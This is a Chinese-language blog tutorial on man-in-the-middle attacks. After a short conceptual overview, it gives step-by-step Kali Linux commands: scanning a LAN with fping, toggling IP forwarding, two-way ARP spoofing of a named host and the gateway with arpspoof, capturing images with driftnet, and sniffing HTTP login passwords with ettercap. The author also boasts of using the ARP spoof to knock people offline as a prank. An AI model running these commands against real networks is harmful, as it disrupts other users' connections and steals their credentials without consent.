中間人攻擊

懶人闖江湖發表於2020-11-23

title: 中間人攻擊
tags: 教程
author: caijinbo
date: 2020-1-1

中間人攻擊

概念

中間人攻擊(Man-in-the-MiddleAttack,簡稱“MITM攻擊”)是一種“間接”的入侵攻擊,這種攻擊模式是通過各種技術手段將受入侵者控制的一臺計算機虛擬放置在網路連線中的兩臺通訊計算機之間,這臺計算機就稱為“中間人”。

中間人攻擊(Man-in-the-Middle Attack, MITM)是一種由來已久的網路入侵手段,並且當今仍然有著廣泛的發展空間,如SMB會話劫持、DNS欺騙等攻擊都是典型的MITM攻擊。簡而言之,所謂的MITM攻擊就是通過攔截正常的網路通訊資料,並進行資料篡改和嗅探,而通訊的雙方卻毫不知情。
隨著計算機通訊網技術的不斷髮展,MITM攻擊也越來越多樣化。最初,攻擊者只要將網路卡設為混雜模式,偽裝成代理伺服器監聽特定的流量就可以實現攻擊,這是因為很多通訊協議都是以明文來進行傳輸的,如HTTP、FTP、Telnet等。後來,隨著交換機代替集線器,簡單的嗅探攻擊已經不能成功,必須先進行ARP欺騙才行。如今,越來越多的服務商(網上銀行,郵箱登陸)開始採用加密通訊,SSL(Secure Sockets Layer 安全套接層)是一種廣泛使用的技術,HTTPS、FTPS等都是建立在其基礎上的。

工具與條件

1.kali系統(本次實驗系統)
2.區域網內
3.本次實驗只是普通的中間人攻擊,純屬娛樂一下

步驟

第一步:掃描網段記憶體活的主機

fping -g -r 0 -s 192.168.1.0/24 | grep alive

在這裡插入圖片描述
第二步:檢視ip_forward的狀態

cat /proc/sys/net/ipv4/ip_forward

預設是0
如果不是0,則修改成0,0代表不轉發流量,1代表轉發流量。

echo 0 > /proc/sys/net/ipv4/ip_forward

第三步:使用arpspoof進行雙向欺騙
安裝arpspoof:

sudo apt-get install dsniff ssldump

進行雙向欺騙:
開兩個終端,一個終端執行下面的一條指令。
arpspoof -i eth0 -t 192.168.1.127 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.127

此時,192.168.1.127這臺裝置應該是不能正常上網了。

我就是喜歡用這招來耍人,讓他們上網上網就斷網了,還找不到什麼原因。

第四步:進行埠轉發

echo 1 > /proc/sys/net/ipv4/ip_forward

第五步:進行圖片嗅探

driftnet -i eth0

第六步:嗅探登入密碼http協議

ettercap -Tq -i eth0

相關文章